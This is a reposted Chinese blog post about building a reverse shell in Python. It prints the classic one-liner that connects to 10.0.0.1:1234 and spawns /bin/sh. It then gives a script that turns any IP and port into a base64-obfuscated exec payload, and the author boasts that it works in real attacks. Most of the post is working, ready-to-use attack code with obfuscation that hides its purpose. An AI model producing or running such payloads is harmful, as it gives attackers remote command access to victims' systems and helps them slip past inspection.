首页 > 代码库 > 『python』让我来编码一下反弹shell的一句话代码
『python』让我来编码一下反弹shell的一句话代码
地址:https://github.com/donghouhe/python_fantan_shell_encode/blob/master/netcat_encode.py 如果你觉得可以,点个star鼓励一下
这是原始的一句命令
1 | python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’ |
运行后,一个shell就反弹到攻击者电脑了。
但是,它不好看, 不够... 炫, 你懂吗?
于是,我要把代码base64编码一下, 让他看上去更cool, 我完成了;
''' data: 2015.2.2 author: ____ __ __ __ __ /\ _`\ /\ \/\ \ /\ \/\ \ \ \ \/\ \ ___ ___ __\ \ \_\ \ ___ __ __\ \ \_\ \ __ \ \ \ \ \ / __`\ /' _ `\ /'_ `\ \ _ \ / __`\/\ \/\ \\ \ _ \ /'__`\ \ \ \_\ \/\ \L\ \/\ \/\ \/\ \L\ \ \ \ \ \/\ \L\ \ \ \_\ \\ \ \ \ \/\ __/ \ \____/\ \____/\ \_\ \_\ \____ \ \_\ \_\ \____/\ \____/ \ \_\ \_\ \____ \/___/ \/___/ \/_/\/_/\/___L\ \/_/\/_/\/___/ \/___/ \/_/\/_/\/____/ /\____/ \_/__/ ''' from base64 import encodestring from sys import argv try: print "python -c \"exec( __import__( 'base64' ).decodestring(", '\'' + encodestring("s=__import__('socket').socket(__import__('socket').AF_INET,__import__('socket').SOCK_STREAM); s.connect(('{}', {})); __import__('os').dup2(s.fileno(),0); __import__('os').dup2(s.fileno(),1); __import__('os').dup2(s.fileno(),2); p=__import__('subprocess').call(['/bin/sh','-i'])".format(argv[1], argv[2])).replace('\n', '\\n') + '\'', ") )\"" # = = i couldn't use str1 + str2 except: print 'Usage: python nc.py ip port'
有点产生payload的意味了。
3张图看效果
实战中也毫不逊色
『python』让我来编码一下反弹shell的一句话代码
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。